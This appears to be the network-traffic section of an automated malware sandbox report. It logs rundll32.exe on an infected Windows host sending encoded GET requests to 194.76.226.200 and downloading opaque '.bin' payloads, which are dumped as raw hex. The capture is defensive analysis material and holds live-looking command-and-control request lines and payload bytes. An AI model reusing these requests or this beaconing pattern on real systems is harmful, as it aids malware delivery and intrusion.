              Jan 26, 2022 10:28:16.082025051 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082046986 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082067966 CET4975580192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:16.082067966 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082087040 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082107067 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082109928 CET4975580192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:16.082130909 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082153082 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082171917 CET4975580192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:16.082175970 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082192898 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082214117 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082216024 CET4975580192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:16.082236052 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082257032 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082277060 CET4975580192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:16.082278013 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082300901 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082314014 CET4975580192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:16.082315922 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082335949 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082356930 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082371950 CET4975580192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:16.082381964 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082403898 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082421064 CET4975580192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:16.082423925 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082439899 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082461119 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082461119 CET4975580192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:16.082484007 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082498074 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082515955 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.082521915 CET4975580192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:16.241817951 CET4975580192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:16.546865940 CET4975580192.168.2.3194.76.226.200
              Jan 26, 2022 10:28:16.566947937 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.817614079 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.817643881 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:28:16.817745924 CET4975580192.168.2.3194.76.226.200
              Jan 26, 2022 10:29:11.737608910 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:29:11.758070946 CET8049753194.76.226.200192.168.2.3
              Jan 26, 2022 10:29:11.758152962 CET4975380192.168.2.3194.76.226.200
              Jan 26, 2022 10:29:12.181500912 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:29:12.201709986 CET8049752194.76.226.200192.168.2.3
              Jan 26, 2022 10:29:12.201833010 CET4975280192.168.2.3194.76.226.200
              Jan 26, 2022 10:29:13.807514906 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:29:13.827811956 CET8049754194.76.226.200192.168.2.3
              Jan 26, 2022 10:29:13.827899933 CET4975480192.168.2.3194.76.226.200
              Jan 26, 2022 10:29:16.967863083 CET4975580192.168.2.3194.76.226.200
              Jan 26, 2022 10:29:16.989033937 CET8049755194.76.226.200192.168.2.3
              Jan 26, 2022 10:29:16.990830898 CET4975580192.168.2.3194.76.226.200

              HTTP Request Dependency Graph

              • 194.76.226.200

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.349752194.76.226.20080C:\Windows\SysWOW64\rundll32.exe
              TimestampkBytes transferredDirectionData
              Jan 26, 2022 10:28:10.396903992 CET1108OUTGET /drew/XCtMkJNFgr1wO/rqNQ0HN4/ZyJyvokVrq1cpfT_2FjRvTK/tLuchRhy61/VY2_2BDejax1_2FZ_/2B4hja3XPXEF/qOMgeh9PvPf/N8zQpyy6Zc5e9b/4QO0R4yS5UCD1QFYshJGy/yTzTKH0fh7Ht9Zwy/6rUgxnlS7Il_2Fi/FA0gREqRHLz3XsH5AC/GH2iS6XmT/92F7y362W9gTjtIUfvoo/J_2Bt2_2BThMLoUrTFI/Ys7KyYaIys_2B6FXPvybrX/6Ff.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:10.675760984 CET1111INHTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:10 GMT
              Content-Type: application/octet-stream
              Content-Length: 205974
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142aa1068.bin"
              Data Raw: 0b 34 4a a5 90 0e c7 6f 93 f0 c9 9c 13 02 b2 b5 cc 76 30 92 6d 0e 22 4f c9 58 34 d7 fe b5 ba b7 5a ab 0e a3 52 08 62 4c 78 fd 91 22 35 10 c2 d3 61 1c 83 02 81 d8 3b c6 4c 9f eb b4 93 cc 31 0c 68 76 c0 57 f4 7b a4 04 53 d7 14 5d 88 7d 03 7f 09 50 4e 57 7a 07 db 05 d1 c4 36 78 ca 9d 10 4e ac a5 10 d0 07 02 c5 07 66 1b 6c 2b 79 30 7f 1d 61 fa ac 7f 36 be 4a 04 de 90 63 1a 5b eb 1a 72 1b 4f 2b 13 db 9c e2 df ae bc dc b0 ca 11 68 65 0d 38 ae be 00 a2 bd de 57 9d 31 ab 78 b9 89 12 36 b3 5a b7 d9 1b df fc 64 47 88 e6 91 15 96 e3 4d b2 e6 5f d6 d8 58 8f 3a b2 67 59 28 e5 38 d6 f3 d4 ec c8 10 cb 0f 32 41 a7 2a d0 1f 18 bc 53 77 e0 20 7c d9 e5 cf 26 82 51 e7 3e 03 7e 6e fa 82 c6 5a 4f 55 0d 03 d4 ae bf c0 d0 28 38 d8 07 65 cf 62 68 a7 c1 c1 d1 04 9c 39 0e 98 08 1e 90 cd 54 de 73 d1 7d 48 94 0f e7 c3 6f 7a 6f 11 8f bb 47 84 66 c5 95 8c 15 cd ea 00 37 32 9a 90 18 45 54 38 b7 be e8 a1 cc 90 1b 98 f1 f7 5a 39 ed 58 2e 04 21 85 12 70 7e 32 24 af ae 9e fb f0 56 71 b6 4f 4b db 22 16 8a 68 b9 da ae 4c a4 5e 8a 77 c8 50 57 04 fc 36 4d c9 28 17 cc a9 81 22 5d 70 7d 9c 4d 02 d1 7b 80 bb 0b e2 ca 73 5a 01 64 06 8f 11 cb 55 51 80 c1 18 c1 c9 38 11 f1 13 d6 39 8d df 7c c4 5e 86 65 c8 35 0a 13 62 48 d7 63 b1 c8 c7 a1 4f f7 6d 06 b5 57 50 fd 27 7b e8 0c 6a 1e 71 3c 3d d8 b8 0e 92 d2 51 19 3e 30 75 20 1f f4 aa 5f a3 2e 32 8a 0d a5 9f 80 7f fd 5b 6a 34 7b 2f 49 f0 28 0b 2b 1b 91 d8 0c 02 6b 60 96 ca 7c 5b 3f f2 0e 4e e1 a6 3a 7d a3 b6 31 11 ca 38 ad 77 4f 69 88 5b d8 dc 1c 50 fc 43 23 dd 4f 28 ab 4b 83 97 d9 83 86 37 d4 35 ee de 1e ed 9f 4b dd 00 a3 72 52 c7 27 04 4d 81 eb e9 ec 96 aa f9 2e 3f 42 c9 06 71 55 3b ac 74 d6 c3 51 95 7c a9 88 a1 29 cd 87 8b 8d 91 80 c2 27 be 0a 9a 79 c4 71 2f 66 cd 0d 8f ea 0b 71 9c 31 65 9c b4 71 c7 83 db 73 ef 97 72 58 6b ec 28 a0 a2 3d 78 f2 60 48 bd de f7 4d 89 e4 48 56 c7 c7 33 40 4f cd 43 22 8e e4 4d 45 8d 73 df 8f 3b 90 ff 56 18 e1 52 36 d5 ad bd 2c e6 ab d4 98 46 02 74 39 79 e3 9d 17 d0 64 90 67 45 46 51 f1 67 82 66 1f 8c 5d 2f d4 55 75 55 00 e1 f5 7d bc b1 1d dc e3 cb 0d 0f 1d 20 b2 78 4b 19 50 9b 9d 80 05 ad 82 b1 4a 3d a9 c6 8d db f6 d1 40 f3 1a 7f 08 ee 73 12 77 8d f0 26 11 a9 d2 b2 53 5f cd 10 a7 56 ee 93 fb 29 64 a4 0d 0c 5a b7 dd f2 4d d8 ac d3 2e 26 e7 8b 9b 7a b8 46 13 e9 c5 1c a2 84 04 46 b6 03 bc dc 61 89 60 bc 13 9e 91 fa d6 f3 ea 0d 74 f1 38 9b 17 fd 5a 50 d8 4f 55 d3 bd f2 87 17 1a 66 8d 83 19 72 7f 9a 6d 49 86 65 84 7a 01 74 85 b2 c3 1d 24 dd 41 ae c5 26 a2 88 c2 f8 ee 1f 8b 69 75 6d 97 da 41 2d 1c 40 fb 6c 84 ee 4e cc e2 be 87 77 6e 71 f8 6c c4 5c 80 74 ca 68 f2 43 f6 3b ab 9d e3 3a 5f d2 44 73 0e be 3b 81 44 26 a5 16 3f 25 ba af e4 df 06 9c 06 17 77 74 07 91 08 54 dd 3d 33 1d 89 0b 05 11 e2 e7 cc 35 63 3d 83 27 fc 18 6e 35 dc 0e 03 ac 48 0e c6 06 d7 2c fe 39 2e 2a a3 29 3c ed c6 e5 88 ea bc 33 77 d9 07 43 16 a8 a3 36 e1 64 5a 40 a3 c8 50 1f fc a8 1d dc 70 3f 8f 91 29 e5 46 82 3a 29 d0 07 c8 e2 80 2b f0 30 a3 39 18 0e b1 c8 d9 db 90 7d 26 dd 91 2f f6 8e 45 3e 1b 26 e1 6f 5b 1f 0b f1 b9 12 d0 62 7e 46 46 19
              Data Ascii: 4Jov0m"OX4ZRbLx"5a;L1hvW{S]}PNWz6xNfl+y0a6Jc[rO+he8W1x6ZdGM_X:gY(82A*Sw |&Q>~nZOU(8ebh9Ts}HozoGf72ET8Z9X.!p~2$VqOK"hL^wPW6M("]p}M{sZdUQ89|^e5bHcOmWP'{jq<=Q>0u _.2[j4{/I(+k`|[?N:}18wOi[PC#O(K75KrR'M.?BqU;tQ|)'yq/fq1eqsrXk(=x`HMHV3@OC"MEs;VR6,Ft9ydgEFQgf]/UuU} xKPJ=@sw&S_V)dZM.&zFFa`t8ZPOUfrmIezt$A&iumA-@lNwnql\thC;:_Ds;D&?%wtT=35c='n5H,9.*)<3wC6dZ@Pp?)F:)+09}&/E>&o[b~FF
              Jan 26, 2022 10:28:10.675791979 CET1112INData Raw: 41 1e fe e1 f1 ae a3 57 10 dd a0 5a ca b8 50 30 d7 31 ea b4 01 7d c2 91 09 08 ce 9b d1 e6 ae 6c fd 9e da 16 2a 6a 80 64 7f 63 cb 76 b1 e5 70 b3 4b ee ae 74 a8 07 13 22 4b 4d e3 26 0a 0e bb b8 51 ea 8f 9e 44 a0 8d 09 23 0d 24 94 39 77 f8 a2 f1 be
              Data Ascii: AWZP01}l*jdcvpKt"KM&QD#$9w"rh=EMw Xxc0~QSmdo8-3eehDx9p1;xt0ccU_n9G~X$$Z~W/sQwI9R:(Ka>k
              Jan 26, 2022 10:28:10.676058054 CET1114INData Raw: 0a ca f3 c8 64 af b7 9c 50 26 44 70 2c 49 ff fe 67 7c 2b 05 27 83 9d ca d1 41 18 02 0a 1a 69 be 8a 10 be 39 ff 50 5e cb 38 a1 51 e9 b8 25 c3 da 00 ce b2 d3 11 05 ff ac ef cd 0f 59 9b ac 6d e0 09 ff 46 68 14 b7 81 d5 da 21 d7 10 14 ba f5 d7 a3 71
              Data Ascii: dP&Dp,Ig|+'Ai9P^8Q%YmFh!q%KNZ6uFY-]_;D[V`>l0&}Lc{+%L9",~uGKU/N^lNw3b3HU/]0e:$A}D"KJ
              Jan 26, 2022 10:28:10.676078081 CET1115INData Raw: ca 39 82 32 ae 72 18 43 1c dd fd 9b ed f6 51 8d ab c6 11 93 a3 20 6e 4b 45 a0 05 a1 80 3f 8d 61 0c 33 55 27 ba 6c 58 57 e5 a2 d4 6a f3 b3 69 e0 3e 0d bb 52 e4 78 c8 75 a6 a1 3c c3 1b 3b d0 ab c4 67 e2 1f 96 3e fb 45 87 8a a9 92 b9 41 ab 64 84 02
              Data Ascii: 92rCQ nKE?a3U'lXWji>Rxu<;g>EAda!i6MT%s9WBIRn<mywgVS*;N+0Ne"D+4`_8K7{g<T<FJ. 7H/=}
              Jan 26, 2022 10:28:10.676105976 CET1117INData Raw: 2f da e6 93 1c a7 c9 16 59 cf 4e 4e ad 91 65 c2 8a da 4b be d1 0c bc de 95 69 0b 8a 07 73 b2 86 1d cf 52 a3 44 c3 a2 5d 4a 22 1c c1 7c 10 9d 26 f5 e4 e3 96 0f 93 73 85 b6 92 35 64 27 a7 d9 16 0d 58 c3 ff 09 4c c5 6f 63 9a ce 1a 10 a7 b6 d1 97 58
              Data Ascii: /YNNeKisRD]J"|&s5d'XLocX'|RQy4MoPg37L_>2dZ}5xNYg'uP]YgH8+6uwHZ@F,D]y]4-d5VpBmKK
              Jan 26, 2022 10:28:10.676122904 CET1118INData Raw: 2b 1d da c2 1d 24 4b f5 b5 ea a5 b2 62 ea 22 a0 72 b6 c7 3a cd dd 7a a3 b2 48 b4 c1 0a 16 9b b3 2b b2 92 14 9d f2 6d 4b 94 43 6a 10 36 cf 56 b9 06 d7 99 90 a6 6d 24 a6 71 8b 1c 56 02 7c 48 0e 94 7c 42 8a 13 68 47 5f 9a 99 f1 fa 2a 72 3a 87 da 1c
              Data Ascii: +$Kb"r:zH+mKCj6Vm$qV|H|BhG_*r:!>QBE.}fS.%;$-<*@_yV1aio /{-0D<mzC.HRto.N,/UjV#|G=XHjpG>Kt<]B
              Jan 26, 2022 10:28:10.676143885 CET1118INData Raw: 3a 5c 45 2a fe db 99 e8 c3 fe 61 44 7a e7 f7 ef 0c 17 e0 d7 65 eb e4 80 70 32 e8 72 16 e7 dd 93 ba b3 f2 d4 b3 1a 70 b9 04 67 92 ab 70 29 f5 4b 2b d9 ad 6d 6f f5 a9 5a 41 33 14 50 da f9 d4 2e 7b 4f 8e 4b 43 d8 b4 b6 22 42 53 b1 f2 70 6d c6 53 59
              Data Ascii: :\E*aDzep2rpgp)K+moZA3P.{OKC"BSpmSYfXo|u_vMGht\mu0QRNuegGi|r45!Z2EYoa5n)
              Jan 26, 2022 10:28:10.676197052 CET1120INData Raw: 1f 46 dd 39 6a e7 ee f5 53 dc 9b 06 ac 90 d4 3b 67 ae 1b c1 52 b2 50 76 d3 e8 37 e1 a6 db 59 88 06 5a 11 85 02 ec 0d ea 01 33 81 bf e6 76 e2 96 d7 26 1d f3 32 ab 6c 59 68 42 c2 e1 f6 80 ba bc 63 e4 e6 31 d8 7a 89 b4 fa a7 59 58 62 d8 c3 4e fd d9
              Data Ascii: F9jS;gRPv7YZ3v&2lYhBc1zYXbNIbt]rDxY3-vmua{eiwcU3){_+r$1B|2iR?}_.B`T>1KR8K vvw%/yN+@|cxgR
              Jan 26, 2022 10:28:10.676215887 CET1121INData Raw: 98 2c d9 b4 4e f3 68 58 f9 0e ab 80 69 3b ef 41 53 03 60 a4 6f 2d ca b3 91 be f8 e0 06 cc 2b 9c 3e 70 83 bb 26 bb db b3 f9 4d 08 88 74 1c e6 4f d7 36 2b 72 01 1e d8 a8 7d cc 2e 91 a2 b1 ba 25 8b 83 40 cf fe 89 83 9a 85 e6 ad 57 67 3e 26 a7 36 1d
              Data Ascii: ,NhXi;AS`o-+>p&MtO6+r}.%@Wg>&6`8~ZCs?O23d!,!w(E3AHNc+xYw!3't3-!Rs;~p)T9;yEu\A>;CR%2f=`A
              Jan 26, 2022 10:28:10.676278114 CET1123INData Raw: c1 88 d1 4b d7 fa 8f 60 1a a7 4c fd 83 e2 de 6d 85 53 29 12 be f7 e5 8f 0f 90 6a 0b 0c 82 3f f7 5d 96 02 48 71 95 08 d4 66 07 a7 a6 a4 e6 f5 8f 84 21 7c 96 8f d6 c2 65 10 44 84 a6 d9 01 2d 90 3a 9d e2 8b 40 6e d9 c3 bb 1a 50 65 80 f1 e7 5f c0 3a
              Data Ascii: K`LmS)j?]Hqf!|eD-:@nPe_:42\)%uu{{d\{x<J/InJ<0%GWc(x8aHH:grs'w9Xf>C"+F/3"csi\gy4uJ!iZj[
              Jan 26, 2022 10:28:10.696175098 CET1124INData Raw: 4e 21 85 2d 19 14 20 8f a4 df 90 16 75 d9 f0 db 92 b5 d1 99 25 b8 71 b8 e2 fb 02 95 4f 85 58 01 6b 41 c7 e0 22 cc 72 ea f2 cf 73 8c 2a 89 cb 20 26 2c cf 12 a2 8f 4a 58 5c 42 41 94 c1 af dd 3f b5 a7 a7 54 2b e7 54 b9 1c 3c 4c 42 5e 50 ee 5a 8d 04
              Data Ascii: N!- u%qOXkA"rs* &,JX\BA?T+T<LB^PZwk~x,GH'dlyndS\>znPtx]<`N__N2J<'$8J@"`Z30E:Z68IwQPc1ypYKq,4yZYY"D!s@Yu \rx5<{
              Jan 26, 2022 10:28:11.085647106 CET1761OUTGET /drew/F2DN_2FU1e/fQ5u04QtqSS_2Fpez/wjKfLKebrhaF/MMToBjmjMxS/2NhI76XoCH_2F5/14TeSntbngCZZYLUNIrhm/x6MB8tXx2hU99kkL/VY0QQM3MDv5NCL1/6ydwr5AoPHPZyujorj/zsR7mWAsu/Dgwxr2J_2Bt6yrRwZsuj/G0YF7iDIM95RsJq2szP/8WMC9D3LjonMIPvdKF1kRz/NQS_2FA_2BozQ/hVadPzcD/tG9pjaS8y_2BWqM0wQM2d5M/W.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:11.361092091 CET2038INHTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:11 GMT
              Content-Type: application/octet-stream
              Content-Length: 262298
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142b543a1.bin"
              Data Raw: bc 58 44 2d 3f 69 1c 31 6f 19 ce bd 43 f0 20 48 2f a8 05 9b 0e 7a 3e 20 f1 f5 39 03 5c ec 25 14 47 ca 20 58 0c 21 39 da 11 c2 cf 7d ea e9 bd e0 29 31 a9 65 5b 07 36 21 bc bd 3c 8d 80 a7 96 dd 76 86 90 74 45 b9 fa 0c 05 46 10 a3 e9 f0 9a 00 ca 11 6e 65 f9 dd 9d 9e 33 63 61 96 0d 7f bc 6d 8d a8 fa 74 5b 85 1f 03 07 2f 96 87 82 0b c0 50 5b e2 9b 0f 15 ef 3a 18 83 ed 78 e9 24 bd d5 50 65 eb d4 69 41 35 6c 8b 36 81 b0 b7 83 87 f2 99 9c dc 14 4c 1a 9e 39 2a 93 cb 6a 9f b7 da 70 12 ff f3 e9 54 c1 a0 da e7 c8 3b cd 2b 9e 48 f8 94 94 82 5c 2e 01 04 3b ba cd a4 44 0b d1 57 48 d1 40 8a 69 00 8a 79 dd 8d 7f 68 fe db 65 87 08 d5 9d 19 70 c1 d2 12 63 26 8d b8 8f eb e2 d4 f6 0c 7d bc 55 af 67 0e 49 6d 0e b0 bd d1 80 06 ea 38 2b 65 3b 8e 6a 76 d7 f7 89 2e 85 0a c9 be b2 8c 42 42 4f 7b 28 2c 6d 27 b9 7b cc 91 47 6f 1f 88 98 1e 3e d4 28 68 c2 c6 76 65 3d 09 3a a5 72 b4 46 f1 e0 d2 94 e7 57 7c e8 19 8c 31 83 ce 83 e7 97 ce 0d 51 ff c2 23 5d df 8e 64 07 b2 10 d9 cf 61 82 c5 34 79 bc fd f2 a6 c1 4e ef 21 d0 c9 a8 a5 ac 9c ad c4 94 e9 f2 fb a7 38 f6 f7 3f ce 80 69 78 cd 93 be d3 de a3 10 69 6a 51 2d 59 9a 13 e0 53 b1 6f 72 a4 e1 7f b3 90 b1 fc d9 aa 59 bc 59 97 82 64 99 0b ac a8 04 bd 04 4c b6 24 de 0d 53 fe 01 a3 13 6e d8 22 78 59 53 fe 95 18 0c 81 d7 5f 8a cd 05 69 1c 65 4a 9b 24 46 06 ac fb 49 9d de 37 60 ae ee c6 6b 29 02 6c 0e a1 3b e0 0e 43 a4 1b 5b 9b c0 e8 8d 54 45 de 9a d1 7b 85 30 17 70 2e 5e fa d1 ea 55 b7 09 4a 45 19 fd 62 7d d2 c2 37 e1 59 70 cb cb f0 59 12 f6 21 3d f8 f7 9e e0 e8 e5 02 1e 2a 2d a8 96 a4 77 f2 5a 2a ef d7 3e 65 47 a9 bb 0f ac db c5 65 7c 27 de b3 3a c9 4a 7a f7 24 47 cf f8 cd e4 d7 14 66 55 28 59 d9 9a d7 12 6e a0 84 de a0 76 b4 cc c5 48 c8 d7 da ed f3 f6 89 a3 23 08 7a d6 31 49 1b e9 e7 f5 6d ad ef 63 c9 09 43 4d d4 6e 47 18 ac 32 2b 65 3e 82 1d 23 61 ac 1b a2 06 be 9d 19 7b 20 df cf 5a 03 ac 9d 11 d3 47 69 f2 af ce 4b ad a1 ef 2b fc 8e 36 0b db d3 e8 4b cd 90 d7 c4 92 08 94 9b ae 29 f1 7f 1c f8 80 24 55 8b 13 76 d8 9f 21 95 73 57 a8 e4 ad be 38 75 6d fc 51 42 da 45 01 ce be a8 8e bf 1c 27 2d 78 d4 11 a5 de 6d 95 43 00 61 1a 51 12 77 fa b9 66 a5 85 6e 81 9b e4 d6 d3 38 f2 eb 8f 6f 53 50 e7 b4 4f a0 f6 69 88 5b 7b c9 03 a4 02 a7 22 52 c6 cd ec d7 dd 58 53 72 01 a5 ea 13 88 ee ef 11 74 a2 bb a7 5a c3 df 31 00 6b ae a5 2c 3e 2d ae 96 ac 4e 83 f7 22 7b 95 a1 31 5a 5d cb ec cc 1a 30 9a c8 2e c3 ed d6 0e fe 52 10 aa d4 ef 89 c6 37 cf fa cd ec c6 8e 8b 1c 5c 25 7c fd 28 86 e8 72 01 b6 e2 94 96 0a 71 4f 83 2d 17 55 15 40 67 58 d8 63 b4 d1 ac 11 2e 37 21 1c 87 20 31 1f 0c 46 58 bb bd ac 41 e6 de 27 05 ca 9c 2d 48 d8 ef 9a e1 71 92 d6 32 99 0d 05 06 b5 45 8e 7a b5 1d b6 89 fa 46 1a e3 d4 79 21 b8 92 e5 c3 80 40 10 5d 85 c8 10 a5 41 c9 0e c6 a2 34 a1 fe b9 e0 85 93 9e 82 3e cc a0 69 a9 d5 7e 1e c3 f2 3f 74 9c 1f 33 20 ec 8f 5a 4f bb 8f 8f e7 42 99 ac 96 ae b4 51 30 56 2f 40 53 32 2f 92 bf 80 4d e5 84 a4 7d bb 6d 96 8c e2 2f 32 c1 b2 a3 da dc 2f fc c6 e4 ea 5b 7c 88 44 b3 05 8f d6 94 0f 25 19 c3 c4 c4 0b 74 37 12 d5 4d ac 86 2b 00 39
              Data Ascii: XD-?i1oC H/z> 9\%G X!9})1e[6!<vtEFne3camt[/P[:x$PeiA5l6L9*jpT;+H\.;DWH@iyhepc&}UgIm8+e;jv.BBO{(,m'{Go>(hve=:rFW|1Q#]da4yN!8?ixijQ-YSorYYdL$Sn"xYS_ieJ$FI7`k)l;C[TE{0p.^UJEb}7YpY!=*-wZ*>eGe|':Jz$GfU(YnvH#z1ImcCMnG2+e>#a{ ZGiK+6K)$Uv!sW8umQBE'-xmCaQwfn8oSPOi[{"RXSrtZ1k,>-N"{1Z]0.R7\%|(rqO-U@gXc.7! 1FXA'-Hq2EzFy!@]A4>i~?t3 ZOBQ0V/@S2/M}m/2/[|D%t7M+9
              Jan 26, 2022 10:28:11.783045053 CET2593OUTGET /drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2vrrl3ds_2/FJYs8ohc9ZfX55MptAq/LUXti_2BtVHZBpG5bp31OD/nUDVndp9HwGDI/fdApFg3Y/hh5zxa6uVZWdnbZZ4Zw497E/am4BWYNw05/CiWFAq8EmF0WMEY2m/vQZOFYV25Mfi/UplJo0Tr14k/U65NpQlAx9OU47/ZEIy4h_2BMYYm16tA/UAd.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:12.061534882 CET2595INHTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:12 GMT
              Content-Type: application/octet-stream
              Content-Length: 1800
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142c0a868.bin"
              Data Raw: f7 46 fb 9e 69 b9 56 c0 85 b5 3c ae 3e aa 33 38 35 5a 64 d6 52 bc 42 12 16 86 d3 f7 ff 19 25 a1 c8 72 2b cd 25 8a 0f 08 f0 2e e4 61 ba 42 9d 9e ee 3c 23 65 bb 49 f2 14 21 9d 9f bb f8 74 45 7d af 3c 4f 96 e8 0c 62 35 ae 13 55 7f f4 5b 3e ec 33 8a 5f 02 aa 2c bb 78 58 74 91 ef b2 91 fc 07 b1 e7 58 01 16 72 83 2b 7e 5a 2e 22 8b 9a 65 0b d7 79 6e 0d e7 28 15 6a e8 b1 91 82 21 54 f1 42 d4 5c ed 5a 9c ad ca f0 37 09 c3 4d 66 b4 a8 3a bf 34 89 96 61 91 fe 08 92 fa 9f 07 60 20 f9 72 77 bb 00 7e de 0d c5 36 8a 15 d9 0b d3 65 62 da dc bf de 5f 75 31 c8 2c 19 59 bb a0 b5 1d cd 5a 5f a9 ef 87 62 5a b8 2f ac b2 11 ba 5a 0e 85 47 da bb e7 69 e5 5a c5 8c 7e 71 4d cc 84 0c ca 20 e6 fc ea e1 ae 33 29 98 ea 7b 38 ab f4 89 e3 49 13 e8 f4 12 e2 b3 55 2c 03 e7 b0 71 4f 4c c1 67 d4 2f 4e 58 7a 5c 7c c7 91 c9 1f fb a9 00 72 7d 9e aa ed 09 bb e1 ea 33 18 c0 d8 95 2f c5 62 25 0b 77 08 41 79 0e 45 9e d9 2b fe e2 ff e7 46 c5 3c 9c 66 88 d2 65 6f d2 88 5a d0 b6 ad 21 b8 01 78 29 d4 8a 06 b1 40 40 bf d5 3d f3 f2 e8 5a fd c5 52 a6 bc 72 a5 1d e9 fe ff 88 56 52 a7 51 8c 13 e5 cb c9 d4 8b 03 7f bb 74 fb ac d1 e1 00 d2 40 cc 15 62 fd 28 ae d8 34 fd 56 dd 6c 02 c9 38 19 2f ff df ce c5 7b 74 cc 44 3d 9c 38 ea 8d 3a 35 f4 c4 01 79 8e 45 d4 c5 dd 89 51 09 7b 3a eb c5 23 9a c6 b6 24 68 77 a9 fb b9 ae c7 ad ae 82 05 1d 78 53 91 a8 80 31 28 10 54 42 2d 2b 6d 56 81 77 61 22 86 c5 47 fa 9a 53 8d bd 63 91 d5 01 a2 1c 33 70 53 45 62 7e 67 68 c2 25 eb 66 32 05 09 0b 79 d2 23 03 03 d2 3a f3 73 e2 c6 5f a8 02 78 b2 d6 5a 2e 24 6e f7 81 5d c4 a4 f2 1e ac 17 c2 eb 88 10 41 7d 02 c7 f9 c0 47 f5 73 8f 0c 15 77 09 27 50 3f 4d fe 7e 88 cb 97 9f 1f 67 28 83 81 84 a1 4b cc 96 e8 d8 2d 77 d2 a0 35 fc 5c c9 39 b0 32 79 1a 79 fb 68 7b 42 34 f4 a9 bb bc 44 6d 8c 97 71 2c 08 c7 8b d8 96 27 1e ed 11 b0 15 a2 16 73 18 fa 7b 31 dc d6 47 5a 83 a7 86 a5 91 84 19 02 d8 99 1f dd 25 a2 3e ee 3a 57 9f 14 d7 0b 14 b4 c3 2e 0c 9c 1c 82 eb ef 3f 79 73 0a 6b c1 1f ff bd 61 83 96 43 15 24 7d 24 26 68 20 d0 0c 3a 69 57 e7 84 4e 04 45 00 39 98 a6 0a 32 41 54 26 8d 78 f2 ab 3b 20 7c b5 42 eb 10 e5 6b 44 e5 f5 9a be d3 42 f8 16 75 bc 5c 2e e0 33 7b cd cd 80 de 28 00 da 8d 26 0e cd 12 fc df be f4 7e 62 e2 1f c9 41 c2 50 74 c5 ac 31 fe 87 d6 9a bf 2a 3b fb 54 1d 7c e4 24 56 54 21 51 52 66 d7 68 04 3e 8a 5e 97 4c fb 60 8d 6f 65 19 9a f8 b0 c4 e0 21 62 ae 1b 91 96 d0 e9 64 c9 94 39 68 9b bd ef 96 5f 8c 09 32 26 fd 16 ee f6 a3 da 2f e8 a6 e4 d5 3f 8b f0 32 ce cb bf 75 ae d3 3a 